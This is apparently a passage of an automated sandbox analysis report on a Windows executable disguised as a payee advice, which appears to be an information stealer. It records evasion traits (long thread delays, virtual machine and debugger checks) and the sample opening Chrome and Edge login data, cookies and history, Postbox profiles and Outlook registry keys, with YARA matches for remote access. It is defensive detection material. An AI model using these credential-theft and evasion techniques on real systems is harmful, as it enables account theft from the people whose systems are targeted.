Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_00402868 FindFirstFileW, 2_2_00402868
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_004065DA FindFirstFileW,FindClose, 2_2_004065DA
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_004059A9 DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose, 2_2_004059A9
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 599875
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 599765
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 599656
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 599547
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 599437
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 599322
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 599218
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 599109
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 598999
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 598890
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 598781
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 598671
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 598562
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 598453
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 598343
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 598234
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 598125
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 598015
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 597906
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 597797
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 597687
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 597567
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 597453
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 597343
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 597234
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 597125
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 597015
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 596906
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 596796
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 596687
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 596578
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 596468
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 596359
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 596250
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 596140
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 596031
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 595922
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 595797
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 595687
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 595578
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 595468
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 595359
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 595248
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 595140
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 595031
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 594921
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 594812
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 594670
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 594562
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4179387047.0000000003378000.00000004.00000020.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4179387047.00000000033CC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_00404243 LdrInitializeThunk,SendMessageW, 0_2_00404243
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_73401B63 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_73401B63
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_02EF3E8D mov edx, dword ptr fs:[00000030h] 2_2_02EF3E8D
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_02EF3E5B mov edx, dword ptr fs:[00000030h] 2_2_02EF3E5B
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process created: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe "C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Queries volume information: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe VolumeInformation
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_0040336C EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess, 0_2_0040336C
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 00000002.00000002.4201423308.00000000339C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: PayeeAdvice_HK54912_R0038704_37504.exe PID: 6104, type: MEMORYSTR
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match File source: 00000002.00000002.4201423308.0000000033AC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: PayeeAdvice_HK54912_R0038704_37504.exe PID: 6104, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000002.00000002.4201423308.00000000339C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: PayeeAdvice_HK54912_R0038704_37504.exe PID: 6104, type: MEMORYSTR